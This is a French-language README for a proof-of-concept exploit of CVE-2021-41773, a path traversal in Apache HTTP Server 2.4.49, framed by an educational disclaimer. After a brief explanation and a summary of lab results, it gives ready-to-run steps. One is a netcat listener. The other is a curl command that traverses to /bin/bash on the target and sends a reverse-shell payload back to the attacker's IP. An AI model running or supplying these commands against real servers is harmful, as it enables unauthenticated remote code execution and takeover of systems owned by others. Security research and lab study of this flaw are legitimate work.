
⚠️ Avertissement
Ce dépôt est destiné strictement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, comme des machines de laboratoire privées.
Toute utilisation non autorisée de ce code contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement l'autorisation de tester est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés.
CVE-2021-41773 affecte Apache HTTP Server version 2.4.49.
En raison d'une validation incorrecte des entrées lors de la normalisation des chemins, un attaquant peut exploiter un dépassement de chemin (path traversal) en utilisant des caractères encodés comme %2e pour accéder à des fichiers arbitraires.
Si CGI est activé, cette vulnérabilité peut être élevée en exécution de code à distance non authentifiée (RCE).
Une requête curl malveillante est conçue pour exploiter la faille de dépassement de chemin. Lorsque CGI est activé, les attaquants peuvent atteindre /bin/bash et exécuter des commandes shell arbitraires.
Dans cet exemple, une charge utile de shell inversé (reverse shell) est envoyée pour obtenir un accès shell au serveur.
Cet exploit a été testé dans un environnement de laboratoire privé. Voici les étapes et les résultats.
Un scan Nmap a identifié la cible exécutant Apache/2.4.49.

Une charge utile de shell inversé a été envoyée à l'aide d'une commande curl personnalisée.

Un shell inversé a été obtenu avec succès sur l'écouteur de l'attaquant.

Étape 1 : Démarrer l'écouteur Netcat
nc -nvlp 4444
Étape 1 : Exécuter l'exploit
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
La version d'Apache est 2.4.49
CGI est activé
Le port 4444 (ou le port de votre choix) est ouvert via le pare-feu
Découvrez l'analyse détaillée et la théorie dans mon article Medium :
👉 Lire l'article sur Medium